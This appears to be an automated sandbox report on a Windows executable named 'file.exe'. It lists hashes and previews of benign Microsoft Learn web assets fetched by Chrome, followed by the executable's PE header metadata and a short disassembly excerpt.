                                                                                                                                                                                  Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):1173007
                                                                                                                                                                                  Entropy (8bit):5.503893944397598
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                  MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                  SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                  SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                  SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
                                                                                                                                                                                  Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                  Entropy (8bit):3.875
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:HMB:k
                                                                                                                                                                                  MD5:0B04EA412F8FC88B51398B1CBF38110E
                                                                                                                                                                                  SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
                                                                                                                                                                                  SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
                                                                                                                                                                                  SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
                                                                                                                                                                                  Preview:CgkKBw2/5iXyGgA=
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):13339
                                                                                                                                                                                  Entropy (8bit):7.683569563478597
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                  MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                  SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                  SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                  SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
                                                                                                                                                                                  Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):17174
                                                                                                                                                                                  Entropy (8bit):2.9129715116732746
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                  MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                  SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                  SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                  SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/favicon.ico
                                                                                                                                                                                  Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):1817143
                                                                                                                                                                                  Entropy (8bit):5.501007973622959
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                  MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                  SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                  SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                  SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/static/assets/0.4.028726178/scripts/en-us/index-docs.js
                                                                                                                                                                                  Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5644
                                                                                                                                                                                  Entropy (8bit):4.785769732002188
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                  MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                  SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                  SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                  SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):17174
                                                                                                                                                                                  Entropy (8bit):2.9129715116732746
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                  MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                  SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                  SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                  SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):13842
                                                                                                                                                                                  Entropy (8bit):7.802399161550213
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                  MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                  SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                  SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                  SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
                                                                                                                                                                                  Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):33148
                                                                                                                                                                                  Entropy (8bit):4.917595394577667
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                  MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                  SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                  SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                  SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):5644
                                                                                                                                                                                  Entropy (8bit):4.785769732002188
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                  MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                  SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                  SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                  SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
                                                                                                                                                                                  Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):64291
                                                                                                                                                                                  Entropy (8bit):7.964191793580486
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
                                                                                                                                                                                  MD5:8CCB0248B7F2ABEEAD74C057232DF42A
                                                                                                                                                                                  SHA1:C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
                                                                                                                                                                                  SHA-256:0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
                                                                                                                                                                                  SHA-512:6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):35005
                                                                                                                                                                                  Entropy (8bit):7.980061050467981
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                  MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                  SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                  SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                  SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
                                                                                                                                                                                  Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Entropy (8bit):7.947652645044466
                                                                                                                                                                                  TrID:
                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                  File name:file.exe
                                                                                                                                                                                  File size:1'840'128 bytes
                                                                                                                                                                                  MD5:acc594995958c5cf5f107fe27db38f8e
                                                                                                                                                                                  SHA1:92b6e9ee6a4a61b292883566738f8b7e038f5eb1
                                                                                                                                                                                  SHA256:2c3841d0070158d8f5824289380656aad74c190ddfd4ee8240eefbfd16988b89
                                                                                                                                                                                  SHA512:e82304a2948ab275c1b243255ce5dc01e5e2763f766eaea6915f6e7be0d130ab7e92d52b38f8f1186d30c809a7da2697f06bf55eb9152a52c81a26df8f21373c
                                                                                                                                                                                  SSDEEP:49152:Chthc6twD12TENAaDstLCXgBgM8IwAfm+ekLqfIWZco:ChtO66R24NPwQg6MDwxfHco
                                                                                                                                                                                  TLSH:41853328C9F81CF9D3F6C23640D5434CAFF84B33D164A9892699897ADF8F95D78A0274
                                                                                                                                                                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g..............................I...........@..........................@I.....pS....@.................................\...p..
                                                                                                                                                                                  Icon Hash:00928e8e8686b000
                                                                                                                                                                                  Entrypoint:0x891000
                                                                                                                                                                                  Entrypoint Section:.taggant
                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                  Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                  OS Version Major:6
                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                  File Version Major:6
                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                  Instruction
                                                                                                                                                                                  jmp 00007F48A06375DAh
                                                                                                                                                                                  pslld mm3, qword ptr [ebx]
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add cl, ch
                                                                                                                                                                                  add byte ptr [eax], ah
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
